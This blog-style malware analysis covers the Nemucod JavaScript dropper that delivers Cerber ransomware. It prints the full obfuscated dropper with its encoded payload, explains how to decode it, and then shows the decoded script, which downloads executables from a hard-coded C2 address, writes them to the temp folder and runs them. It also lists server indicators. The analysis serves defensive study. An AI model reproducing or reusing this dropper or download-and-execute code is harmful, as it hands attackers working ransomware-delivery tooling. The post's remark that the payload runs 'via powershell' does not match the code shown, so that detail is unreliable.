Skip to content →

JS/Nemucod.ED!Eldorado – Cerber Ransomware. The JavaScript dropper.

A recent malware has been spotted in the wild, known with the name of Cerber. The malware is spread through phishing emails attached with a .zip file containing a malicious JavaScript file. The idea is to trick people to double click on the JavaScript file in order to execute the code on Internet Explorer. The JS is only a dropper responsible to download malware on the victim machine and is recognized by AV with the name of JS/Nemucod.ED!Eldorado. The JS code reported below is the malicious payload of the dropper.


function cjspx()
{
	var mkmpz=new Array("_"+""+"T","g"+"."+"f","h"+")"+""+"{","e"+"("+"p","+"+"+"+";","]"+"."+"su");
	return mkmpz[Math.floor(Math['rand'+new Array('om')[0]]()*mkmpz.length)];
}
function tiins()
{
	var zkqqd="a2c29cf93ad8b21c222ca6a3beae26d5b20db921d4d6fa7c28f7f2addc3ba750bfd62eefb3bdd62ed8a09be73df9020d9e22c671acf53da1a23cd867fc73ac653dffb23c3b63fe46fc0b2cc212ee7e23a9e23fed2dbba2ed312cfef24d7266b4134caa3bb1c3dbf336beb34bba39af62ef893df586fdcd37f2122f9a23cbb07b1a3bc403ba863ff946fa4a72dfe6fa9c21e5d2ae1638d826fca20ee162cd2d3bed626bf039e892af8217d7600c562dffc25e582ae592ccf03bbd867d166dafc02db51cf5a17abe02c8f03b547df5861b0717fc502b6503d8407c3e1bff51bcee1fc776db0b66c6e74e9037c6722dac23e4407aa73ba653bca43fc1061f5420cb93fca22aa1721c0267b956dcaf08ec50aa3f1bc8e6de4463abe6ff3a3af4a3dbb523bfc63d786fd4429f662efad23d023cecc2ae8e66d4374b8d37cbc22b5323fc707e0b3bb573bbf13fbcc61aa53ca392ab6e21ada2be2e67adc66cc674b2026d5929f966fc0e67fa337bd922bf623ec807ed53bf513ba933fd3761bde3cd593bd132ef613bb0e3ad8b3ca706fb2f72b3772cc96fee67df8a7fceb7fda166dd06fd7234b893dfb02af2b3ba993ad783de4f21d0d6fc292cca62ee3c23a7423d4e2daf12ee192ccae24e0367f4b37d0d22ae823cfa07be23bc963bcb53fc0561eef1ded92aa0c3cf463fd6520ad421f243cf9c2a"+
	"ae80dc6120d512bd4d36a4863fea6fa9e29c0d2ed6f23e373cd562aaab66a5174bd432af82adb823bd13ca6a2aeee34ed23db872ad913bca63acd43ddf221a8d6fd0a2cdce2ebce23bad23cf52df0d2efe92cb6724c1567c3c21bc63ae7323ebf23ee963f686fa213befe3dc263af872aaf966f4574b4b32b3732b262cfdb2ebfc3bbcb2cb3c27df56fee467cc72afea3dc5c3de8f20b4c3de7b66fa834cca3db602ad493bfa63aa753dfd021db26fce52cbfb2eea623c3323a782dfeb2eba72cddc24e0a67c3721da73aef623df123e7363a906fd493bb843df223acea2aa7d66de874ed732b7632c6b29d753aa1821f6e2ce113ba8126fa820d4721e446fc9a28ffe2ac773bf070bb5b2eb4b3bb442ebfd67f722ca752ebcd23e9b23e132dbcb2ef1e2cc4324a7766ca534b6a3bc813ddcd36cb734ba728be42aaa53be280ba5f2eda03bfff2ec5609ce33db7f20d0922ae81ace33dde523a2067ea46dd8327cf83be673baad3fe5875c7760eb660a6677c7876e7261be97bc877ff6c61b677ea4b77c037ee9f61b047cdea76af260a2125d793ca4d60e837eb8661aee2abf837a322abc16dece63af16fa0829dab3ac9321dda2cefa3be2926c4b20d9821d9467d033ddbb2aa673cecf3aa7c23d7a3bb7c63ede6fd782ae1e3dba03dc5520a7a3dc4766c4d6faf534f4a26d1929d0e6fa0167"+
	"ada6ed3e2ae463ddb03de2d20f4b3da1f66f0e34b203db342ac313bab33ae073db3221e236fff72cce72ecce23c2223e742dab62eab22cbbb24f1d67eff3daac2ac2c3cf893afca23ec13bafb63c186fd6329b232eae223e1b3cf7c2ad4466a1174ffc32feb2ac7b23ef23ca342ab3334c2328ad02ae7d3ba8d0ba3b2eefa3bf622ec5e09d623df0520ee722ae51afdb3dde323c2667a256dfb027e3f3bea43be7d3fb6c75f7c60e2a60fa077e1b76b2c61cf87baba7fe0661b9b7ead277e987ed8061b357ce1576d4760bb525fc13ccb060fe37dd1e61dd92aa8e37fc32aea36db4763d926fe6f29ed03ada021f302cfc73bbdf26b0a20c9621dc967e723da582ae453ccbe3aa7223d2f3ba6c63e966fddd2ae603dc5e3dd5520e383dba466bba6fb6c34b7226a6029ce76fbfc67e616eef52aad83dd323df6c20ca33dbf966bfd34e5c3db9b2aa613ba4e3ac6d3defe21eb56ff4e2ce7f2ecbc23b0223ef02dfee2ef232cf8824d5767c433dff72afcc3cf393ac6323d613bae163ab26fb8029fed2eb8223c513cf1c2adbf66a4474bc932bf92ab1523c5b3ce2b2ae4334e0728e682afd33bde60be432ec813bad22eb4609a473df2a20e1522b101afc83de7823b6a67cc36dcce27d243be383bcd93fab075b1a60ec760cbc77e1376d8f61dfb7bd8c7ff7f61bbc7efc977c297ea1661c727c"+
	"b5276cd960b8825e1e3cfc660f127cccf61e3e2ad3137e082aecb6da3963d716fa6129a3d3accd21d5a2cc5d3bcd126cb020eb721db967b6f3db852ab973cae43ae0823d1c3bc8063ce56fade2ac8b3dea23ded020a223dd4266f3a6fbcb34a4426da329eae6fe2867d126effe2ab223dca53dd8820bb43dec766a7134b6b3db4d2adff3bfac3afef3df7921ae16fd3b2cf192ea3f23a6423e982df472ede12ccb124b9867fa73df492ade03ca2b3ae4223b2a3bfcd63a6c6fba829bf12edba23a0f3cd3d2ab4f66e3374e7532d212ac4623b713cf0e2af5b34c653dbf72aa203baec3abe33dd0521d186fe5f2ce182eecb23f4123e0e2dcb12eed12cf2124ea067b4a21f3e3ad3e23a3c23fd163fc06ff363bf333def43aedd2ac2266ac574a6832a7032e4866ee474dc732e0032a8966b6774ad832be532c2a66e3174d1432ee42cb812ed603bb612cf0627ba36fff367e642ad573ddd83ded720a2f3dab566f1034fc43daef2abac3bc023af373dad421db26fed32ceef2ebbf23f8a23a0a2ded52ed6f2cf1124a2d67ca021ca73ad0723dc223c0963a036ff8e3ba253def63aa172ae8266cfb74e9532b2132b9029e033ae7a21e8c2cb7a3bd7b26a5320ab221f9a6facb28a242affd3bef51bdfb2ac3322ac93ffcd09ef926ab223dcd2acef1fdbd2edbb3bf5027cbc67db966a8634e743b"+
	"d7f3dd2b36c8b34b2839a032ef783dcd36fb8f29fa63caac6fc3372bb46fe2b21f7c2aa9738b6c6ffca0ee132cfcc3baf826e4039a852ab8717a3d00f672db0b25e692ad502cf163bd4567a286dd4e1ce982cc9a3db6e26d903fc9e3be3426ce521f0828a0961d4c09d3526a9c23fb32af6b1cba436b973cc173bfde2abf022f8c00c1e2df2825dd42af992ccd43bd2c6da0c66d5074c8839a4e2eea13df726fbef3bda722a253fbb609ade26f6423cdb2aeff01eb02ee0e22efe2ae7a6fb8b72db86feb56de9a13ae813fd66dfb26fb9a64b996fb6e02ea72ed423ba3d27b1761e363dce42eeaf21ee82bd4e20b7522a4e67dc466dd661d373be3920b081cc833bc723de1526f4a21a6f28adb67b997cd1b79eed66c4761ebd3ca353abe52dcc83cadc3bafa3df3367bc37dac363e576fb4376a6566c846ffee64a2d6fe3b6ddef61f5a2ae5837a3b2ac7f6dd9474eeb39aaa2eacc3debe6fd5f3bd1322be83ff2009c9e26b3923de82ab221fe3f2ef103bdbf27d5e6ff8e72a316ff9029fdb3cb6b61fac08f9e2af513bbfb1cb8e3fb382ab6a2cb2326fc12ed1723bb109a0020a5d23a0c2bfd42af273da5b67f9c7de6066ef06fc3664c3f6fe343be4c22dfa3fe0b09bbe26a7923f6d2ac6b01aad2ec2122b242ade774c063de8f2afb03bfb13ab973daeb21fe76fd783bfb922e483fc0209"+
	"f9926d5423bee2ab491fd592eb293bdbf27a7074d6d32ab72cb7e2efe43be342ce6727dfb6fa3c67dd92acff3da053debe20be73dba666ca934fad3da3c2af3e3bdbc3aa3b3da4521b216fb7e29f0a2ea1523dbe3ccd22aba574b5e32e6332f7729eb83aeed21ea82cdb93be5526eb220eec21b316fb263cbcb2efc739bc72aab21bd6d20a421bb2d2ac1c22a4e3fa7267dbf2bb7a2ef073ba032eb2863a3a6fa7c2cadc2efe123f2723fa22dff92ec022cfba24efc66cee34a273bf243ddf336da534a8f39a4c2ef073df626fc413fb0e2eb023bd7327f126feac72bb56faf828e912ac563bcb01bce32ac3c22cb43fd8509f7f26caa23fc92abc21fb372ed033bb1227c7567bfe66c9874f5d26dc929b966ffc267e143fbad2ecfd3bd5527e9466fec34ba139a5d2ed073de746fa6420caf2da3c25ab21cb903bd603db042abb82eb6122d686ff8c72ac86fee021fe52ae5d38cc46fa1c0eb692cf9f3bf3526beb39a192ade817ab700c0b2db1825c292ab6d2cf273bfd967e386df380eba80bfc400a3c0bf7d0dbde61f251cdf63ba043dd062aa592ed9422a416db6366a3074e8720e492dbf825df21cf8a3ba9e3df292ae3b2ee6122a7461f6a00a4d3ff6c2aafa21ba367edb66e9d74c8e20a762db9b25c411ca753be203dd492ab732ec6122b4961aa11bac736cee3fa642aa606fc4a72"+
	"add6fd357efaa74ffd20be82dbe525f641cf803be0f3dc132aa112ee0422b5f61e1c18f5c3db0c26d523bfe02abd367b542bc752ec7d3bdb32ed0366b7874aa120e462dee525d521cf973beec3db642aa1f2ea9922bff61fe01fedc20acb3cc5126d193bef826f2d20e2d21e576fc0572c756fe427ff7d74cd320c632de5225c131cb153bbf93dd532aea92eb0c22b5361abe1cb362ec3a39c0b2adeb1be3020ccf09da026ad323e272ae3367e753fbc72ee513bffe27cc363a3f6feb07ddd766fa874aaa20b022dded25af31caa13ba2c3db3e2aa3a2efb822a7361d0c0cbf723b8620b853cb0f2abae67ad366ae574fae3dbc72ac6e3ba0d3adf63de1d21b676fab12cacf2ebdf23d9923cc52de3a2ee542cfd224ac367ee93fb242ec4e3bb8d27ae663f836fe6529d492eee723e243ca142ad6666eb974fe132d212aac923acf3cc722ae526fc4434d643dfe92aac43bfa33af553df5221b7d6fad42cbc92ec3b23dc223f012dbbd2ec782cf2c24ed167a2821e453aa8123dd423c6e63c296fc643bbd03df9b3ad892ad9a66a6d74c8632c2332d792cdd02ea6e3bcad2ce8727f1d6fba667ebb2af233da843db2a20fa83dccc66b3834b3f3ddfe2ac303bf163adc83dfde21e116fdcb2ca292ee7b23c0f23b4c2dbaf2ee8e2cb1c24dc067dba21d673ac8923e7e23dd063d3c6fb773bb5f3d"+
	"b8f3ae3a2adb666b7b74dc432aaa32a5828dd02ac3e3bf740bf0b2ed0d3bb302ed7e67c1b29d463ab5a21fe92cb6a3bb3126dfa20b8521ab86ff6f67daf2bb422ef873bc362ee7b63dbf6fd4c2ab853dd0e3de5520efe3df4466efa6fb5c34f3326caf29b436fa8067b146ebe82add63dda03df9920cdc3da9e66cea34b4d3cc562ee0639bf62ad841ba1d20dc71ba352ae5c22eac3fdde67c452bf4d2ea6c3bc142ed1463cae6fec229ab73ae0221f2f2cd833be4626f6b20dbb21f6c6fed767ea43facf2edb93bd7027d1263fe66faca2af673dc2c3db1020d153de2266f0c6fb4334eb426a7329c7f6fa3467c066ebc72af873da593da2320e663da5166b5734cad3bcae3dd2936e5634c2c39f422eb643dc596ff7d38fa23cb3c27a986fe4972d3d6fe9e21f532af9938eed6fda40ec7f2cca13bba026fac39b3e2aa1917abc00b962df9525d2e2ae872cfe13bf4b67ce66da4918a601cd862cccd3df0726a493fa213bcde61c041cbe327d272aa4c23dd423e5e6df1066b2c74f3f38f0b3cf2627e5561ac71ddda3ab8821d7c67d4c3fa8f2ee513bf1027dca66ebf74bfb32d892cbc12ef673bcda2cbe327bd76fba867f442ad2e3dc5d3dad620f223dfd866a656ff0434ec232c1c32fde32a6166ec674ee332ba532b6266f8774";
	var gfltf;
	while(true){
		try
		{
			gfltf=ytzte(zkqqd);
			break;
		}
		catch(er)
		{
			var a = 1;
		}
	}
	return gfltf;
}
function ytzte(cmift)
{
	return (new Function("cshqx","wgqod","dsvyh","var ibmqd=cshqx.match(/\\S{5}/g),vztbz=\"\",jlawe=0;while(jlawe<ibmqd.lengt"+cjspx()+"vztbz+=Strin"+cjspx()+"romCh"+"arCod"+cjspx()+"arseI"+"nt(ibmqd[jlawe"+cjspx()+"bstr(3,"+"2),1"+"6)^79);jlawe"+cjspx()+"}eval(vztbz);")(cmift,null,null));
}
tiins();

The code is composed by three functions:

• cjspx()

This function is responsible to correctly complete the string in the function ytzte, and so correctly create a new Function to decode the obfuscated payload.

• tiins()

This is the main function, containing the malicious obfuscated payload and the logic to de-obfuscate it. The payload is loaded in the variable zkqqd and is processed in a infinite loop, that ends only when the de-obfuscation process is correctly completed.

• ytzte(cmift)

This is the function responsible to de-obfuscate the malicious code.

In order to decode and understand what this dropper is doing we can use the Developer Tools from Chrome, and go though three simple steps:

1. Extract all the values in the array allocated in the function cjspx()


2. Rebuild the string used to create the new Function in the ytzte function, in order to get a correct syntax.
We can create a new function, called test that will decode the obfuscated payload. The regex matches a string of 5 chars every 5 chars.

</pre>
function test(a){

var ryybh=a.match(/\S{5}/g)
var zhhzw="";
var dbdvx=0;
while(dbdvx<ryybh.length){
zhhzw+=String.fromCharCode(parseInt(ryybh[dbdvx].substr(3,2),16)^42);dbdvx++;
}
console.log(zhhzw)

Few characters in the array are there just to create noise and are not useful to create the function.

3. Pass the obfuscated payload to the function ytzte and print it through the console
The decoded payload will look like:

</pre>
function getDataFromUrl(url, callback) {
try {
var xmlHttp = new ActiveXObject("MSXML2.XMLHTTP");
xmlHttp.open("GET", url, false);
xmlHttp.send();
if (xmlHttp.status == 200) {
return callback(xmlHttp.ResponseBody, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}

function getData(callback) {
try {
getDataFromUrl("http://89.40.181.39/js/1.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://89.40.181.39/js/2.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
getDataFromUrl("http://89.40.181.39/js/3.exe", function(result, error) {
if (!error) {
return callback(result, false);
} else {
return callback(null, true);
}
});
}
});
}
});
} catch (error) {
return callback(null, true);
}
}

function getTempFilePath() {
try {
var fs = new ActiveXObject("Scripting.FileSystemObject");
var tmpFileName = "\\" + Math.random().toString(36).substr(2, 9) + ".exe";
var tmpFilePath = fs.GetSpecialFolder(2) + tmpFileName;
return tmpFilePath;
} catch (error) {
return false;
}
}

function saveToTemp(data, callback) {
try {
var path = getTempFilePath();
if (path) {
var objStream = new ActiveXObject("ADODB.Stream");
objStream.Open();
objStream.Type = 1;
objStream.Write(data);
objStream.Position = 0;
objStream.SaveToFile(path, 2);
objStream.Close();
return callback(path, false);
} else {
return callback(null, true);
}
} catch (error) {
return callback(null, true);
}
}
getData(function(data, error) {
if (!error) {
saveToTemp(data, function(path, error) {
if (!error) {
try {
var wsh = new ActiveXObject("WScript.Shell");
wsh.Run(path);
} catch (error) {}
}
});
}
});

The malicious script tries to download a malware from a C2 server, save it into a temporary path with a random name and execute it via powershell.

Server detected so far:

• 89.40.181.39
• i01001.dgn.vn

Published in News >>

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *